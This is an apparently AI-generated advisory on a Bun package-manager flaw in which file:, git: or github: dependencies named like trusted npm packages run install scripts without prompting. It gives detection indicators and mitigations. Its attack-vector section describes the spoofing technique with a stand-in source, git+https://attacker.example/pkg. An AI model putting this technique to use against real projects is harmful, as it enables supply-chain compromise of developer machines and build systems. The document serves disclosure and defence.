CVE-2026-24910 Overview
CVE-2026-24910 is a trust boundary vulnerability in Bun, the JavaScript runtime and package manager, affecting versions prior to 1.3.5. The flaw allows a non-npm package to spoof entries in the default trusted dependencies list, also known as the trust allow list. An attacker can exploit this when a package referenced via file, link, git, or github protocols shares a name with a trusted npm package. The vulnerability is classified under CWE-348: Use of Less Trusted Source.
Critical Impact
Spoofed trusted dependencies can execute lifecycle scripts during installation, enabling supply chain compromise on developer machines and build infrastructure.
Affected Products
- Bun runtime and package manager versions before 1.3.5
- Development environments using Bun for dependency resolution
- CI/CD pipelines executing bun install against untrusted manifests
Discovery Timeline
- 2026-01-27 - CVE-2026-24910 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2026-24910
Vulnerability Analysis
Bun maintains a default trusted dependencies list that automatically permits postinstall and other lifecycle scripts to execute for well-known packages. The trust check matches against the package name without sufficiently validating the package source. When a manifest declares a dependency using a non-registry specifier such as file:, link:, git:, or github:, and that dependency carries a name identical to a trusted npm package, Bun treats it as trusted. This allows arbitrary local or remote code referenced by these protocols to inherit the trust posture intended only for verified registry packages.
The issue is tracked alongside a broader disclosure of JavaScript package manager weaknesses. Further context is available in the Bun 1.3.5 release notes and the Koi.ai PackageGate disclosure.
Root Cause
The root cause is reliance on the package name alone as the trust identifier. The trust comparison does not bind the allow list entry to a specific registry origin or integrity hash. Any specifier that resolves to a matching name satisfies the check.
Attack Vector
An attacker authors a package.json that references a malicious source such as git+https://attacker.example/pkg and sets the dependency name to match an entry on Bun's trust allow list. When a developer runs bun install, the malicious package's lifecycle scripts execute without prompting. Exploitation requires local interaction with the manifest, consistent with the local attack vector classification.
No verified proof-of-concept code is publicly available. See the SC World coverage for additional reporting on the disclosure cluster.
Detection Methods for CVE-2026-24910
Indicators of Compromise
- Unexpected child processes spawned by bun or bun install during dependency installation
- package.json entries that reference file:, link:, git:, or github: sources using names of popular npm packages
- Outbound network connections from build hosts to non-registry git endpoints during install operations
Detection Strategies
- Audit lockfiles and manifests for dependency names that conflict with well-known registry packages but resolve to non-registry specifiers
- Inspect Bun installation logs for lifecycle script execution tied to dependencies that should not be on the trust list
- Compare resolved dependency origins against an internal allow list of approved registries
Monitoring Recommendations
- Enable process telemetry on developer workstations and CI runners to capture script execution chains rooted in bun
- Forward package manager logs to a centralized analytics platform for retroactive hunting
- Alert on git or HTTPS fetches performed by package managers to domains outside approved infrastructure
How to Mitigate CVE-2026-24910
Immediate Actions Required
- Upgrade Bun to version 1.3.5 or later on all developer workstations, build servers, and container images
- Review recent installs for manifests that reference non-registry dependencies sharing names with trusted npm packages
- Rotate credentials and tokens accessible from build environments if suspicious installs are identified
Patch Information
The vendor fix ships in Bun 1.3.5. The release tightens the trust allow list matching so that non-npm specifiers no longer inherit trust based on name alone. Release details are published in the Bun v1.3.5 announcement.
Workarounds
- Set the trusted dependencies list explicitly in package.json using the trustedDependencies field and remove reliance on Bun defaults
- Run bun install --ignore-scripts in untrusted contexts to suppress lifecycle script execution
- Pin dependencies to registry sources and reject manifests containing file:, link:, git:, or github: specifiers in code review
# Configuration example
bun install --ignore-scripts
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
